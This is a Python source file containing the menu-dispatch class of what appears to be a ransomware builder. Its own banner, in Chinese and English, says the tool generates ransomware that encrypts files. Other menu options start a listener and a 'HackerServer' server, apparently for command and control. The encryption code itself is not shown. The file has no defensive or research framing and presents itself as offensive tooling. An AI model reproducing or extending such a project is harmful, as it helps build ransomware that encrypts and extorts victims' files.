import Aop.Aop
from HackerServer.Server import Server
class Switch():

    def __init__(self,option):
        self.option = option

    def start(self):
        if(self.option == "1"):
            print("\n本工具是一个勒索软件,通过本工具所生成的勒索程序,可以把文件给加密了.\nThis tool is a ransomware, through the tool generated by the ransomware program, you can put the file to encrypt.")
            while True:
                check = input("o ready（准备好了吗）（yes/no）?:")
                if(check == "yes"):
                    break
                else:
                    print("\n本工具是一个勒索软件,通过本工具所生成的勒索程序,可以把文件给加密了.\nThis tool is a ransomware, through the tool generated by the ransomware program, you can put the file to encrypt.")
        elif(self.option == "2"):
            checkListen = Aop.Aop.start()
            return checkListen
        elif(self.option == "3"):
            checkstart = Server()
            checkstart.start()
        elif(self.option == "4"):
            return "exit"
        else:
            return "no choose"
